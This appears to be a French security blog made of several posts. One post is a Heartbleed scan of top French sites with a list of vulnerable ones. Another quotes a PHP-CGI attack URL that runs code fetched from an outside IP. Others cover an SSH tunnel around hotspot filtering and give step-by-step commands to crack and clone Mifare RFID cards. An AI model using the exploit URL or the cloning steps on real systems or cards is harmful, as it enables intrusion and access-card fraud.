lock.jpg

La nouvelle faille SSL Heartbleed (CVE-2014-0160) qui fait trembler Internet depuis ces dernières heures semble toucher de nombreux sites Web sur la toile d'après les premiers articles publiés.

Cette faille peut permettre à un pirate de lire jusqu'à 64Ko de la RAM d'un serveur web distant sans aucune trace d'intrusion. Je vous laisse imaginer les informations auxquelles un attaquant pourrait avoir accès à distance et les conséquences associées.

Pour vérifier l'impact de cette faille sur les 500 plus gros sites Internet français , j'ai développé en quelques lignes un script en PHP qui extrait le top 500 des sites internet français du classement Alexa et qui les audite grâce à l'application Heartbleeder téléchargeable ici.

<?php

for ($i = 0; $i< 19 ;$i++){
$page = file_get_contents("http://www.alexa.com/topsites/countries;".$i."/FR");

preg_match_all('/<a href="\/siteinfo\/[\da-z\.-]+\.[a-z\.]{2,6}">(.*)<\/a>/i', $page, $matches);
foreach ($matches[1] as $match){
        echo "# ".$match;
        $result = exec("./heartbleeder $match");
        if (preg_match('/VULNERABLE/i',$result)){
                echo (' :: VULNERABLE');
        }
        echo "</br>";
}
}

?>

Voici le résultat de l'exécution de mon script cette nuit :

  1. Google.fr :: VULNERABLE
  2. Google.com :: VULNERABLE
  3. Facebook.com
  4. Youtube.com :: VULNERABLE
  5. Wikipedia.org :: VULNERABLE
  6. Yahoo.com :: VULNERABLE
  7. Leboncoin.fr
  8. Orange.fr
  9. Amazon.fr
  10. Live.com
  11. Free.fr
  12. Linkedin.com
  13. Twitter.com
  14. Lemonde.fr
  15. Lefigaro.fr
  16. Adcash.com
  17. Ebay.fr
  18. Tukif.com
  19. Commentcamarche.net
  20. Wordpress.com
  21. Tumblr.com :: VULNERABLE
  22. Allocine.fr
  23. Lequipe.fr
  24. Ad6media.fr
  25. Viadeo.com
  26. Linternaute.com
  27. Pagesjaunes.fr
  28. Sfr.fr
  29. Nouvelobs.com
  30. Akamaihd.net
  31. Jeuxvideo.com
  32. Programme-tv.net
  33. Leparisien.fr
  34. Xhamster.com :: VULNERABLE
  35. Dailymotion.com
  36. Cdiscount.com
  37. Over-blog.com
  38. Pinterest.com :: VULNERABLE
  39. Msn.com
  40. M2newmedia.com
  41. T.co
  42. Ovh.com
  43. 20minutes.fr
  44. Instagram.com :: VULNERABLE
  45. Pole-emploi.fr
  46. Microsoft.com
  47. Bing.com
  48. Lexpress.fr
  49. Priceminister.com
  50. Societe.com
  51. Apple.com
  52. Vube.com
  53. Stackoverflow.com :: VULNERABLE
  54. Paypal.com
  55. Voyages-sncf.com
  56. Journaldunet.com
  57. Xvideos.com
  58. Clkmon.com
  59. Credit-agricole.fr
  60. Livejasmin.com
  61. T411.me
  62. Aufeminin.com
  63. Ovh.net
  64. Fnac.com
  65. Deezer.com
  66. Vente-privee.com
  67. Boursorama.com
  68. Reverso.net
  69. Tf1.fr
  70. Ask.com
  71. Meteofrance.com
  72. Youporn.com
  73. Labanquepostale.fr
  74. Bfmtv.com
  75. Liberation.fr
  76. Laposte.net
  77. Pornhub.com
  78. Lesechos.fr
  79. Wordreference.com
  80. Amazon.com
  81. 01net.com :: VULNERABLE
  82. Outbrain.com :: VULNERABLE
  83. Seloger.com
  84. Lepoint.fr
  85. Adxcore.com :: VULNERABLE
  86. Gameforge.com
  87. Clubic.com
  88. Booking.com
  89. Huffingtonpost.fr
  90. Googleusercontent.com
  91. Doctissimo.fr
  92. Openclassrooms.com :: VULNERABLE
  93. Webrankinfo.com
  94. Dpstream.net :: VULNERABLE
  95. Prestashop.com :: VULNERABLE
  96. Bnpparibas.net
  97. Badoo.com :: VULNERABLE
  98. Vimeo.com
  99. Caisse-epargne.fr
  100. Zone-telechargement.com :: VULNERABLE
  101. Wikimedia.org :: VULNERABLE
  102. Wordpress.org :: VULNERABLE
  103. Canalblog.com
  104. Service-public.fr
  105. Societegenerale.fr
  106. Cpasbien.me :: VULNERABLE
  107. Francetvinfo.fr
  108. Imgur.com
  109. Canalplus.fr
  110. Rueducommerce.fr
  111. Caf.fr
  112. Canadaalltax.com
  113. Flickr.com :: VULNERABLE
  114. Vivastreet.com
  115. Banquepopulaire.fr
  116. Mysearchdial.com :: VULNERABLE
  117. Colissimo.fr
  118. Themeforest.net
  119. Developpez.net
  120. Eurosport.fr
  121. Neobux.com :: VULNERABLE
  122. Voila.fr
  123. Tripadvisor.fr
  124. Conduit.com
  125. Skyrock.com
  126. Redtube.com :: VULNERABLE
  127. Adobe.com
  128. Ouest-france.fr
  129. Aliexpress.com
  130. Leroymerlin.fr
  131. Admngronline.com
  132. Marmiton.org
  133. Yeslibertin.com :: VULNERABLE
  134. Paruvendu.fr
  135. Imdb.com
  136. Meetic.fr
  137. Europe1.fr :: VULNERABLE
  138. Laredoute.fr
  139. Google.co.uk :: VULNERABLE
  140. Ratp.fr
  141. Indeed.fr
  142. Lcl.fr
  143. Bouyguestelecom.fr
  144. Ebay.com
  145. Php.net :: VULNERABLE
  146. Kickass.to :: VULNERABLE
  147. Slideshare.net
  148. Hardware.fr
  149. 1and1.fr
  150. Forgeofempires.com
  151. Fotolia.com
  152. Reddit.com
  153. Thepiratebay.se
  154. Linguee.fr
  155. Xnxx.com
  156. Laposte.fr
  157. Blogspot.com :: VULNERABLE
  158. Potins.net
  159. Goodgamestudios.com
  160. Soundcloud.com
  161. Ikea.com
  162. Scoop.it :: VULNERABLE
  163. Zimbra.free.fr :: VULNERABLE
  164. Rtl.fr
  165. Lesnumeriques.com
  166. Castorama.fr :: VULNERABLE
  167. Ladepeche.fr
  168. Adopteunmec.com :: VULNERABLE
  169. Larousse.fr
  170. Apec.fr
  171. 1fichier.com :: VULNERABLE
  172. Interieur.gouv.fr
  173. Metronews.fr
  174. Journaldesfemmes.com
  175. Atlantico.fr
  176. Sourceforge.net
  177. Mappy.com
  178. Lacentrale.fr
  179. Mes-meilleurs-films.fr
  180. Mozilla.org
  181. Darty.com :: VULNERABLE
  182. Creditmutuel.fr
  183. Thefreecamsecret.com
  184. Amoureux.com
  185. Purepeople.com
  186. E-monsite.com :: VULNERABLE
  187. Deviantart.com
  188. Leguide.com
  189. Uptobox.com :: VULNERABLE
  190. Uploaded.net :: VULNERABLE
  191. Zanox.com
  192. Footmercato.net
  193. Sudouest.fr
  194. France3.fr
  195. Showroomprive.com
  196. Carrefour.fr
  197. Battle.net
  198. Alibaba.com
  199. Koramgame.com
  200. Ldlc.com
  201. Openadserving.com
  202. Semrush.com
  203. Bestusefuldownloads.com
  204. Tradedoubler.com
  205. Koreus.com :: VULNERABLE
  206. Adserverpub.com
  207. Wiktionary.org :: VULNERABLE
  208. Pap.fr
  209. Fdj.fr
  210. Minutebuzz.com
  211. Netvibes.com :: VULNERABLE
  212. Slate.fr :: VULNERABLE
  213. Egaliteetreconciliation.fr :: VULNERABLE
  214. Ameli.fr
  215. Awesomehp.com
  216. Cam4.fr
  217. Latribune.fr
  218. Github.io
  219. Jeanmarcmorandini.com
  220. 9gag.com :: VULNERABLE
  221. Twitch.tv
  222. Papystreaming.com
  223. Bp.blogspot.com
  224. Zalando.fr
  225. Scrutins.net
  226. Portail.free.fr
  227. Alsacreations.com
  228. You-will-date.com
  229. Journaldugeek.com
  230. Dropbox.com :: VULNERABLE
  231. Dl-protect.com :: VULNERABLE
  232. Tomsguide.fr
  233. Wikia.com :: VULNERABLE
  234. Mobile.free.fr
  235. Asos.fr
  236. Github.com :: VULNERABLE
  237. Groupon.fr
  238. Topito.com
  239. Airfrance.fr
  240. Onvasortir.com
  241. Frandroid.com
  242. Imp.free.fr
  243. Spi0n.com :: VULNERABLE
  244. Betclic.fr
  245. Files.wordpress.com
  246. Francetv.fr
  247. Tube8.com
  248. Ad2games.com :: VULNERABLE
  249. Telerama.fr
  250. Lavoixdunord.fr
  251. Frenchweb.fr
  252. Decathlon.fr
  253. Impots.gouv.fr
  254. Torrentz.eu :: VULNERABLE
  255. 3suisses.fr
  256. Voici.fr :: VULNERABLE
  257. Mediapart.fr
  258. Centerblog.net
  259. Materiel.net :: VULNERABLE
  260. Systweak.com
  261. Forumactif.com
  262. Hellocoton.fr
  263. Pcinpact.com
  264. Bbc.com
  265. Comprendrechoisir.com :: VULNERABLE
  266. Korben.info :: VULNERABLE
  267. Cic.fr
  268. Vpsdomain4.eu
  269. Archive.org :: VULNERABLE
  270. Premiere.fr :: VULNERABLE
  271. Themightyquest.com
  272. Zeobit.com :: VULNERABLE
  273. Snapdo.com
  274. Full-stream.net :: VULNERABLE
  275. Bbc.co.uk
  276. Aeriagames.com
  277. Shutterstock.com
  278. Onclickads.net
  279. Wix.com
  280. Legifrance.gouv.fr
  281. Millenium.org :: VULNERABLE
  282. Challenges.fr
  283. Chaturbate.com :: VULNERABLE
  284. Lachainemeteo.com
  285. Netaffiliation.com
  286. Amazonaws.com
  287. Arte.tv
  288. Gandi.net
  289. Logic-immo.com
  290. Wawa-mania.ec
  291. Adsl.free.fr
  292. Softonic.fr
  293. Vk.com
  294. Viamichelin.fr
  295. Jacquieetmicheltv.net
  296. Alittlemarket.com
  297. Trovigo.com
  298. Doublepimp.com
  299. W3schools.com
  300. Paris.fr :: VULNERABLE
  301. Gamekult.com
  302. Auchan.fr
  303. Covoiturage.fr :: VULNERABLE
  304. Boulanger.fr
  305. Forum-auto.com
  306. Mailchimp.com
  307. Iminent.com
  308. Urssaf.fr
  309. Pagesperso-orange.fr
  310. Gentside.com :: VULNERABLE
  311. Wannonce.com :: VULNERABLE
  312. Midilibre.fr
  313. Netechangisme.com
  314. Spartoo.com :: VULNERABLE
  315. Travelagency.travel
  316. Loading-delivery1.com
  317. Monster.fr
  318. Rapidgator.net
  319. Appround.us
  320. Doodle.com :: VULNERABLE
  321. Stackexchange.com :: VULNERABLE
  322. Coqnu.com
  323. Webmaster-rank.info
  324. Purevid.com
  325. Codecanyon.net
  326. Xcams.com
  327. Mediaplex.com
  328. Gameblog.fr
  329. Futura-sciences.com
  330. 6play.fr
  331. Megavod.fr
  332. Amazon.co.uk
  333. Ubuntu-fr.org
  334. Yelp.fr :: VULNERABLE
  335. Xe.com :: VULNERABLE
  336. Dailymail.co.uk
  337. Radins.com :: VULNERABLE
  338. Franceinfo.fr
  339. Bizpowa.com :: VULNERABLE
  340. Skype.com
  341. Kimsufi.com
  342. Letudiant.fr
  343. Feedly.com
  344. Grooveshark.com
  345. Fastdailyfind.com
  346. Aweber.com
  347. Speedanalysis.net
  348. Hootsuite.com
  349. Media.tumblr.com :: VULNERABLE
  350. Youjizz.com
  351. Directrev.com
  352. Domaintools.com
  353. Ask.fm
  354. Easyjet.com
  355. Abritel.fr
  356. Etsy.com
  357. Mmotraffic.com
  358. Pixmania.com
  359. France2.fr
  360. Cdn4711.net :: VULNERABLE
  361. Aol.com
  362. Programme.tv :: VULNERABLE
  363. Maxidivx.com
  364. Ebay.co.uk
  365. Cadremploi.fr
  366. M6.fr
  367. Maville.com
  368. Tuxboard.com
  369. Blogger.com :: VULNERABLE
  370. Theguardian.com
  371. Searchfun.in
  372. Jeu.info
  373. Demotivateur.fr
  374. Startertv.fr
  375. Presse-citron.net
  376. Opodo.co.uk
  377. Sarenza.com
  378. Megacinema.fr
  379. Leagueoflegends.com :: VULNERABLE
  380. Planet.fr
  381. Buzzfeed.com
  382. Wifi.free.fr
  383. Madmoizelle.com
  384. Ledauphine.com
  385. Easyvoyage.com
  386. Hm.com
  387. Wordpress-fr.net
  388. Addthis.com :: VULNERABLE
  389. Babylon.com
  390. Effiliation.com
  391. Google.es :: VULNERABLE
  392. Edreams.fr
  393. Openask.com :: VULNERABLE
  394. Adf.ly :: VULNERABLE
  395. Zdnet.fr
  396. Foozine.com :: VULNERABLE
  397. Delta-search.com
  398. Dealabs.com
  399. Konbini.com
  400. About.com
  401. Elle.fr :: VULNERABLE
  402. Cuisineaz.com
  403. Unblog.fr
  404. Wetransfer.com :: VULNERABLE
  405. Gizmodo.fr
  406. W3.org
  407. Europa.eu
  408. Conforama.fr
  409. Parisexe.com
  410. Downparadise.ws
  411. Routard.com
  412. Femmesdispo.com
  413. Brandalley.fr
  414. Majesticseo.com
  415. 22find.com
  416. Soonnight.com
  417. Beeg.com :: VULNERABLE
  418. Oxatis.com
  419. Mycanal.fr
  420. Macg.co
  421. Numericable.fr
  422. Generation-nt.com
  423. Steampowered.com
  424. Frenchtorrentdb.com
  425. Turbobit.net :: VULNERABLE
  426. Homelidays.com
  427. Dailygeekshow.com
  428. Newhdplugin.net
  429. Lesinrocks.com
  430. Microsoftonline.com
  431. Yac.mx
  432. Sofoot.com
  433. Jeuxonline.info
  434. Ranks.fr :: VULNERABLE
  435. Twenga.fr
  436. Numerama.com
  437. Hardsextube.com
  438. Gtmetrix.com
  439. Insee.fr
  440. Maxifoot.fr
  441. Universfreebox.com
  442. Mondialrelay.fr
  443. Jacquieetmicheltv2.net
  444. Pubeco.fr
  445. Abondance.com
  446. Viedemerde.fr :: VULNERABLE
  447. Sports.fr :: VULNERABLE
  448. Ozap.com
  449. Motherless.com :: VULNERABLE
  450. Ma-reduc.com
  451. Fnacspectacles.com
  452. Jimdo.com
  453. Cloudfront.net
  454. Prizee.com
  455. Caradisiac.com
  456. Westernunion.fr
  457. Bwin.fr
  458. Education.gouv.fr
  459. Pmu.fr
  460. Online.net
  461. Forumconstruire.com
  462. 750g.com
  463. Letribunaldunet.fr
  464. Huffingtonpost.com
  465. Publicidees.com
  466. Vide-greniers.org :: VULNERABLE
  467. Cnn.com
  468. Airbnb.fr :: VULNERABLE
  469. Joomla.fr :: VULNERABLE
  470. Hsbc.fr
  471. Xlovecam.com
  472. Cloudify.cc
  473. Z5x.net
  474. Qadabra.com
  475. Duckduckgo.com :: VULNERABLE

Sur les 500 plus gros sites français 97 sont aujourd'hui vulnérables à cette faille SSL.

Le parlement européen travaille actuellement sur l'amélioration de la sécurité de votre vie privée.

Ceci en proposant notamment de nouvelles lois interdisant l'utilisation de conditions d'utilisation abusives ou imprécises sur Internet.

Nombreux sont les sites Internet utilisant des termes et conditions d'utilisation allant à l'encontre de la vie privée de ses utilisateurs. Aujourd'hui ces sites vivent grâce à la négligence des utilisateurs qui ne prennent pas le temps de lire ces conditions d'utilisation barbares, souvent vagues, qui de plus sont amenées à changer à tout moment sans que l'utilisateur en soit correctement informé.

Une fois inscrit sur ces plateformes, il est souvent impossible de récupérer et de supprimer ses données personnelles. Les utilisateurs se retrouvent bloqués face à des services sans scrupule.

Dans d'autres cas ce sont vos données personnelles qui sont revendues à d'autres sociétés sans vous en soyez informé. Vos données sont ensuite utilisées pour du mailing ou du ciblage publicitaire ...

Aujourd'hui, les conditions d'utilisation des services sont surveillées par quelques passionnés non rémunérés. Chaque faux pas des sociétés sur les conditions d'utilisation peut créer des mouvements de foules non maîtrisés.

Il y a une règle à prendre en compte à l'heure d'aujourd'hui sur Internet :

"Quand un produit sur Internet est gratuit d'utilisation, cela signifie que c'est vous le produit."



Article sponsorisé par BeOn

php_logo.jpg

Une importante faille PHP semble occuper de nombreux robots et script kiddies.

Cette faille permet d'exécuter du code PHP à distance et de prendre la main sur un serveur Web très facilement. Voici l'URL que l'attaquant utilise pour détecter si votre serveur est vulnérable :

http://www.monserveur.com/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F61.19.253.26%2Fecho.txt

Cette URL est sollicité de nombreuses fois par jour sur mon serveur, je pense que de nombreux serveurs ont été infectés ;-(

En cas de vulnérabilité de votre serveur, l'appel de cette URL permet d'exécuter sur votre serveur du code PHP provenant d'un serveur Thailandais : http://61.19.253.26/echo.txt

<?php echo "dsfer34w5rlsidfosdedfpsd"; ?>

La faille a été découverte mi-mai touche heureusement que les serveurs avec PHP fonctionnant en mode CGI ou l'exécutable PHP est exécuté lors de la requête HTTP. Les serveurs utilisant des pool de CGI PHP de type Fast-cgi ou le mod_php classique d'Apache sont épargnés à ce type d'attaque.

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.

http://www.cvedetails.com/cve/CVE-2012-1823

Je vous invite à vérifier dès maintenant la version de votre installation PHP ;-)

cybercriminalite-europe.jpg

Vous ne savez pas comment expliquer la cybercriminalité à vos parents. La notion de botnet, spyware, trojan leur est totalement opaque ?
Voici une vidéo financée par la Commission Européenne qui a comme objectif de sensibiliser les personnes sur la sécurité informatique et sur le fait que toute personne connectée sur la toile est potentiellement vulnérable.

L'autre message important porté par la vidéo concerne les accords entre les pays et les sociétés que la Commission Européenne met en place afin d'enrayer le développement des botnets sur les réseaux et de limiter la cybercriminalité.

La vidéo est simple, efficace, compréhensible par Mr et Mme tout le monde. Pour vous les geeks, j'imagine que les messages vous parlent et que PF et Iptables sont votre leitmotiv ;-)



(Voir la vidéo si celle-ci ne s'affiche pas)

Me concernant, je me suis fait piraté deux fois malgré la sensibilité que je porte pour la sécurité informatique. Ces deux piratages sont seulement ceux que j'ai découverts, j'imagine que potentiellement d'autres personnes / robots ont eu leurs heures de gloire sur mes machines.

Je me suis fait piraté mon serveur Linux en 2005, j'ai décrit à ce sujet un récit très complet allant jusqu'au tracking des pirates sur un réseau IRC.

Depuis cette époque d’insouciance, mon NAS s'est fait piraté une fois, j'ai évité le pire avec une autre faille de sécurité que j'ai découverte dans le formulaire d'authentification du NAS.

Bref, être sensible à la sécurité n'est pas suffisant, il faut savoir se protéger. Heureusement, nos Box ADSL possèdent de très bons firewalls qui limitent les casses. A l'époque des modems RTC, 80% des personnes connectées étaient facilement vulnérables.

Sortez sur le Web couvert !


Article sponsorisé par BeOn

lock-security.jpg

Par défaut les systèmes de blog possèdent tous un mécanisme d'authentification applicatif permettant de protéger "normalement" toutes les ressources se trouvant dans la zone d'administration du site.

Cependant, il arrive parfois que des failles applicatives soient détectées et permettent à des personnes tierces mal intentionnées de pouvoir exécuter des tâches d'administration sans en avoir les autorisations.

Il y a une astuce très simple qui permet d'augmenter la sécurité d'un blog, cette astuce consiste tout simplement à placer un second mécanisme d'authentification de type Basic HTTP password en entrant sur la zone d'administration.

Ex : http://www.geeek.org/admin/

Cela se fait très simplement sur Apache et sur l'ensemble des autres serveurs Web.
Sur Apache, il suffit de placer un fichier .htaccess dans le répertoire "admin" de votre blog et de définir une politique d'authentification.

AuthType Basic
AuthName "Blog admin"
AuthUserFile /path/to/.htpasswd
Require valid-user

Pour vous aider à générer ce fichier, il existe des outils en ligne.

Après cette petite opération, tous les accès au répertoire d'administration du blog seront filtrés directement par le serveur Web. Les possibles vulnérabilités seront alors hors de portées.
Une autre solution efficace consiste à renommer le répertoire d'administration afin de la rendre non prédictible et limiter les attaques provenant de robots.

Enfin, si vous êtes encore plus paranoïaque que moi, vous pouvez aussi restreindre l'adresse IP ayant accès à la zone d'administration et déporter le contenu du fichier .htaccess directement dans la configuration du serveur Apache si vous en avez les droits.

AuthType Basic
AuthName "Blog admin"
AuthUserFile /path/to/.htpasswd
Require valid-user

Order Deny,Allow
Allow from 11.111.11.111
Deny from all

Satisfy any

Pour terminer, si vous souhaitez bloquer définitivement les tentatives de bruteforce, vous pouvez configurer Fail2ban pour qu'il agisse dynamiquement sur l'IPtables de votre serveur au bout de 5 tentatives d'authentification infructueuses par exemple. Pour cela vous pouvez aller jeter un oeil sur l'article Fail2ban dédié à Apache :

http://www.fail2ban.org/wiki/index.php/Apache

Vous avez désormais tous les outils entre les mains pour surprotéger la zone d'administration de votre blog.
Et vous ? Qu'utilisez-vous pour sécuriser les accès à l'administration votre site Web ?


Crédits photo : Subcircle

Voici une astuce toute bête pour surfer de manière sécurisée et non limitée depuis un PC ayant des restrictions d'accès au HTTP (port 80).

ssh-tunnel-http-proxy.png

C'est le cas sur certains hotspots publics, le port 80 est souvent filtré et ne fonctionne qu'après une authentification depuis un portail captif.

L'astuce consiste à utiliser un tunnel SSH pour faire transiter tout son trafic HTTP vers une machine sur Internet n'ayant aucune limitation.

Cela fonctionne seulement si le flux SSH sortant est autorisé depuis le lieu où vous vous connectez.
Il vous faut préalablement un serveur Linux accessible depuis Internet avec un serveur SSH d'activé.

La première étape consiste à installer un proxy HTTP sur la machine Linux qui va servir de relais. Vous pouvez utiliser pour cela Tinyproxy, il est léger et très simple à configurer.

apt-get install tinyproxy

Par défaut, le proxy HTTP démarre sur le port 8888.

/etc/init.d/tinyproxy start

Ensuite, il vous suffit de créer un tunnel SSH avec Putty par exemple. Reprenez les informations suivantes :

putty.jpg

Le tunnel ouvre un port 8080 local et redirige tout sur le port 8888 du "localhost" du serveur distant.

Il ne vous reste plus à configurer un proxy sur votre PC depuis les paramètres de votre navigateur.

proxy-http.jpg

Et vous voilà libre de surfer en toute liberté, tout votre flux HTTP / DNS transite via le serveur distant.
Le hotspot ne voit plus aucune de vos requêtes HTTP et les personnes sniffant le réseau Wifi non plus. Cette solution est une alternative simple aux solutions de VPN plus lourdes à mettre en oeuvre.

Update : Seconde solution encore plus simple

La seconde solution proposée par Seb et qui évite l'installation d'un proxy HTTP consiste à créer un tunnel SSH dynamique.

putty-dynamic-ssh-tunnel.jpg

Et à déclarer le tunnel comme un proxy Sock depuis les paramètres avancés de configuration du proxy de votre navigateur :

proxy-sock.jpg

Cette solution plus simple et évite de devoir installer un proxy HTTP sur le serveur intermédiaire.

Merci Seb pour cette astuce ;-)

Les idées toutes simples sont parfois les meilleures en termes de sécurité. Voici trois astuces pour augmenter la sécurité de votre carte bancaire.

credit-card-securite.jpg

  1. Remplacez votre signature par un "Check for ID". En cas de vol de votre carte, la signature est normalement vérifiée sur des paiements à l'étranger. En plaçant "Check for ID", cela devrait restreindre l'idée à un voleur d'imiter votre signature, car il ne la connait pas.
  2. Grattez avec un cutter le code CVV2 de votre carte afin d'éviter qu'un commerçant ne s'amuse à copier la totalité de vos informations bancaires dans votre dos. Même si ce code est calculable, d'après quelques recherches réalisées sur Internet, cela devrait dissuader pas mal de fraudeurs.
  3. Enfin, payez sur Internet avec des e-cartes bleues virtuelles, Paypal, Kwixo et S-money ..

Voyez-vous d'autres astuces ? :-)

hackinparis.png

HACK IN PARIS, l’évènement annuel dédié aux professionnels de la sécurité informatique, propose cette année une sélection de 8 formations dispensées du 17 au 19 juin 2013 au Centre de conférences de Disneyland Paris.

Au programme de ces 3 jours :

  • Finding Vulnerabilities in SCADA/HMI software (3 jours du 17 au 19 juin)
    • par FERRANTE Donato et AURIEMMA Luigi
  • Hacking IPv6 Networks (version 2.0) (3 jours du 17 au 19 juin)
    • par GONT Fernando
  • Building Secure Applications (2 jours du 17 au 18 juin)
    • par MANICO Jim & KEARY Eoin
  • Reverse Engineering in Win32 apps: how to protect yourself in-the-wild (1 jour le 19 juin)
    • par RODRIGUEZ Ricardo
  • Hacking RFID - all you need to know and have in just 1 day (1 jour le 19 juin)
    • par COSTIN Andrei
  • Hardware Hacking for Software Pentester (3 jours du 17 au 19 juin)
    • par ALLAIN Yann et MOINARD Julien
  • Corelan Live (3 jours du 17 au 19 juin)
    • par VAN EECKHOUTTE Peter (Corelan)
  • Digital Forensics with Open Source tools training (3 jours du 17 au 19 juin)
    • par BAGUELIN Frédéric

Pour plus d'informations : www.hackinparis.com/trainings

Si vous avez des DIF, ces formations sont éligibles.

Suite au premier article de Thomas, je vous propose un second et dernier article en mode "Guest Blogging" sur l'analyse des fraudes bancaires sur Internet.

C’est un fait de plus en plus réel qui est appuyé par de plus en plus de statistiques, l’insécurité sur internet a augmenté depuis 5 ans et cela concerne de plus en plus les paiements en ligne lors d’actions bancaires. Cela affecte malheureusement non seulement les entreprises mais surtout les particuliers.

Face à ce problème, les autorités mais également des entreprises tentent de proposer des solutions pour régler ce fléau.

Les fraudes sur internet et surtout les fraudes lors de paiement en ligne augmentent dangereusement d’année en année. Ainsi on s’aperçoit que les exemples de fraudes à la carte bancaires ne manquent pas d’animer l’actualité. L’enquête de l’institut national sur la sécurité des particuliers révèle en effet que les victimes d’au moins un début frauduleux dans l’année sur leurs comptes bancaires est passé de 500 000 à 650 000 entre 2010 et 2012 soit une nette augmentation de ces fraudes de 30% sur cette période. Il s’agit dans la majorité des cas de fraudes en parti causé par l’utilisation de numéro de compte, de numéro de carte bancaire ou d’identifiants de connexion à un organisme financier. Cela concerne aussi beaucoup les paiements en ligne.

Malheureusement, on observe avec attention que les autres exemples sont nombreux. La semaine dernière, un article du Figaro mettait en avant que la gendarmerie française avait interpellé 22 fraudeurs qui avaient prélevé pendant plus de 3 ans plus de 6 Millions d’euros à des milliers de victimes. Plus généralement, les fraudes à la carte bancaires ont représenté l’année dernière plus de 413,2 millions d'euros, a révélé le dernier rapport annuel d'activité de l'observatoire de la sécurité des cartes de paiement.

A côté des fraudes à la carte bancaires lors d’action bancaire, c’est donc également sur internet où l’on remarque le plus de fraudes. Ainsi la progression du taux de fraude sur les paiements à distance et notamment sur internet est de l’ordre de 22%. De plus sur toute les fraudes commises à la carte bancaire, plus de la moitié concernent les paiements à distance sur internet a souligné le rapport annuel. Il n’en fallait pas plus pour alerter les autorités de la gravité de la situation et les entreprises sur les services pouvant être proposé.

On est juste de remarquer que la cybercriminalité a ainsi engendré un développement remarquable du marché de la sécurité informatique où on s’aperçoit que le nombre de société proposant des services de sécurité informatiques a plus que doublé en 10 ans. Face à l’augmentation des fraudes, les entreprises et les particuliers font plus souvent appel à ce genre de services pour mieux se protéger contre une fraude bancaire et sélectionnent désormais plus leurs moyens de paiements.

Pour garantir la sûreté de leur site de paiement en ligne, plusieurs entreprises n’hésitent pas à acheter un certificat ssl pour prouver la sûreté de leurs sites lors d’un paiement à des clients. Ces certificats sont donc délivrés par des entreprises extérieures et rendent impossible la fraude des données échangées. De plus pour s’assurer de la sûreté des documents reçu et notamment les documents confidentiels en ligne, les banques utilisent désormais tout comme les entreprises des signatures numériques utilisant le principe de Digital Signature Algorithm (DSA) pour donner la confirmation qu’il ne s’agit pas d’un spam et donc prouver la validité du message et de son expéditeur.

La fraude à la carte bancaire devient donc un sérieux problème pour les entreprises et les particuliers. Face à ce problème en expansion, des solutions existent pour garantir des actions bancaires et donc des paiements en ligne en toute sécurité.


Article sponsorisé

Les cartes RFID Mifare 1K possèdent deux protections principales :

  • Le block 0 est en lecture seule, seul le constructeur de la carte peut initialiser ce block.
  • Les données écrites sur les cartes sont encryptées.

Il existe cependant des solutions pour outrepasser ces protections et permettre de créer des copies exactes. Cet article détaille la procédure pour cloner une carte RFID Mifare 1k sous Linux.

Remarque importante : Avant toute chose, sachez que les commandes indiquées dans cet article peuvent détruire le contenu de votre carte RFID en cas d'erreur manipulation.

1. Achat d'une carte RFID Chinoise

La première étape consiste à se procurer une carte chinoise avec une backdoor pour écrire sur le block 0.

Ces cartes ne sont pas simples à trouver sur la toile et coûtent environ 25$. Leur backdoor physique permet de modifier le contenu du block 0 qui est normalement en lecture seule sur des cartes classiques.

Ce backdoor permet ainsi de faire passer ces cartes chinoises pour n'importe quelle carte Mifare 1K existante. Dans cet article, j'ai utilisé une carte procurée par le site xfpga pour valider les commandes shell.

2. Préparation de l'environnement Linux

La solution la plus simple pour obtenir tous les outils Linux permettant de hacker des cartes Mifare est de télécharger le Live CD Openpcd qui fournit en standard tous les outils déjà compilés. Il est possible que la distribution Backtrack contienne un certain nombre d'outils, mais je n'ai pas fait le test.

Une fois l'ISO téléchargée et le contenu de l'ISO placé sur la clef USB avec un outil comme Unetbootin par exemple, il vous suffit de redémarrer votre PC et de le faire booter sur la clef USB.

3. Dump/Cracking des cartes

La troisième étape consiste à créer des "dump" des deux cartes : La carte chinoise et la carte à copier.

Mais aussi de casser les clefs d'encryptage utilisées sur la carte à copier pour permettre une recopie exacte des données stockées dans la carte à copier.

// Placez la carte chinoise sur votre lecteur :
# mfoc -P 500 -O carte-chinoise.dmp
// Placez la carte à copier sur votre lecteur :
# mfoc -P 500 -O carte-a-copier.dmp

4. Recopie du contenu

La quatrième étape consiste à copier le contenu de la carte sur la carte chinoise :

// Placez la carte chinoise votre lecteur :
# nfc-mfclassic w a carte-a-copier.dmp carte-chinoise.dmp

5. Modification du numéro de série

La dernière étape consiste à modifier le numéro de série de la carte choinoise avec le numéro de série de la carte copiée.

// Placez la carte à copier votre lecteur :
# nfc-list

Le numéro de la carte s'affiche, gardez-le de coté. Remplacez les XXXXX par le numéro de série de la carte.

// Placez la carte chinoise votre lecteur :
# nfc-mfsetuid XXXXXX

Vérifiez que le numéro de série de votre carte chinoise est identique à votre carte.

# nfc-list

Vous voilà avec deux cartes RFID identiques, merci les chinois ! ;-)